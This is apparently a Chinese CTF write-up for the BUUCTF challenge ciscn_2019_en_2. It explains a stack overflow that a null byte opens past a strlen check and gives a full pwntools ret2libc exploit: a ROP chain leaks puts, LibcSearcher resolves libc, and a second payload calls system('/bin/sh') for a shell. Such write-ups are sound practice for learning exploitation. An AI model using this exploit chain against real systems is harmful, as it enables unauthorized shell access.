BUUCTF ciscn_2019_en_2

这题整体的思路是ret2libc
先checksec

理一下题目：


只有功能1是能用的，输入1，来到encrypt函数，输入s，因为后面有strlen，所以\0截断，溢出为0x58
exp：

from pwn import *
from LibcSearcher import *

context.os='linux' 
context.arch='amd64' 
context.log_level='debug' 

r = remote('node3.buuoj.cn',25795)
#r = process('./ciscn_2019_en_2')
elf = ELF('./ciscn_2019_en_2')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x400B28
ret = 0x0000000000400C84
pop_di = 0x0000000000400c83 # pop rdi ; ret
r.sendlineafter('choice!\n','1')
p = flat(['\0', 'a'*0x57, pop_di, puts_got, puts_plt, main_addr])
r.sendlineafter('encrypted\n',p)
r.recvline()
r.recvline()
#puts_addr = u64(r.recv(8))
puts_addr=u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))
#puts_addr= u64(r.recvline()[:-1].ljust(8, '\x00'))
#print(puts_addr)
#print(hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libc.dump('puts')
sys_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
r.sendlineafter('choice!\n','1')
p = flat(['\0', 'a'*0x57, ret,  pop_di, binsh_addr, sys_addr])
r.sendlineafter('encrypted\n',p)
r.interactive()

需要注意的是接受puts_addr好像不能写u64(r.recv(8))，会通过不了